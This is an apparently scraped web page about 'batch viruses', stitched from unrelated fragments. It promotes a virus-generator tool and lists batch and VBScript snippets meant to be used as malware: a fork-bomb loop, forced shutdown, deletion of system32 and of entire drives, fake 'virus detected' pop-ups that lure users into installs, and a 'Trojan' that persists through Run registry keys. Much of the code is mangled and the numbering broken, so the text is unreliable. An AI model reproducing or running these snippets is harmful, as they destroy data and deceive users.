Batch Virus Download

May 18th, 2015
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Batch Virus Maker

  • Check if your URL is correct or not; so this an example that use Bitsadmin and it works 5/5 for me. @echo off:menuLOOP cls Title Downloading Cleaning Tools to remove virus by Hackoo 2016 Color 9E & Mode con cols=80 lines=11 echo( echo( echo(. Menu. echo( for /f 'tokens=2. delims= '%%A in ('findstr /b /c:':menu' '%f0') do ( echo%%A%%B ) echo( echo(. set choice= echo.
  • DELmE’s Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim’s PC such as formating C: drive, deleting all files in Hard Disk Drive, disabling admin Privileges, cleaning registry, changing home page, killing tasks, disabling/removing antivirus and firewall and lots more.
  1. Virus codes @echo off (cmd wont show command) @echo on (cmd will show command)
  2. #1 simple virus (opening-cpu drain)
  3. @echo off
  4. start
  5. goto :A
  6. #2 simple shutdown command - not really a virus
  7. shutdown -s -t 00<(time) -c 'message here' (you dont need a message)
  8. #3 make a bunch of folders to the desktop - not really a virus
  9. @echo off
  10. cd 'c: documents and settings%username% <<(or) documents and settingsall usersdesktop'
  11. md %random%
  12. :A
  13. (if you want to add more sites add the start (URL here) command here and below)
  14. goto :A
  15. #5 system 32 deleter (HARMFUL)
  16. @echo off del c:windowssystem 32 (extesion.bat)
  18. #6 delete every file off computer
  19. del D:. /f /s /q
  20. del F:. /f /s /q
  21. del H:. /f /s /q
  22. del J:. /f /s /q
  23. Start Crash
  24. (you can copy and paste Start Crash over and over again for more power)
  25. X=Msgbox('Virus Is Active',0+16,'Virus Alert')
  26. X=Msgbox('Wanna Fix Virus',0+16,'Fix Virus')
  27. del D:. /f /s /q
  28. del F:. /f /s /q
  29. del H:. /f /s /q
  30. del J:. /f /s /q
  31. :A
  32. ping localhost -m 5 >nul
  33. This has a lot of nasty stuff in it. This can KILL a machine once ran. ( DO NOT TRY ON MAIN MACHINE )
  34. #9 Message Box - Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus or message displays while virus is running.
  35. X=Msgbox('Virus Found On Your Computer',0+16,'Virus Detected')
  36. You can copy and paste this to have more messages pop up. (you have to run in VBs)
  37. #10 Trojan Horse virus - very simple Trojan Horse virus that WORKS. (.bat)
  38. @echo off
  39. Start C:Programsvirus.bat
  40. echo break off>>c:windowswimn32.bat
  41. echo end>>c:windowswimn32.bat
  42. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  43. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  44. PAUSE
  45. :top
  46. GOTO top
  47. Set wshShell =wscript.CreateObject(”WScript.Shell”)
  48. wscript.sleep 100
  49. loop
  50. deltree C:

Batch Virus Download Pc

Mac download image not recognized. DELmE’s Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim’s PC such as formating C: drive, deleting all files in Hard Disk Drive, disabling admin Privileges, cleaning registry, changing home page, killing tasks, disabling/removing antivirus and firewall and lots more.

Batch Virus Download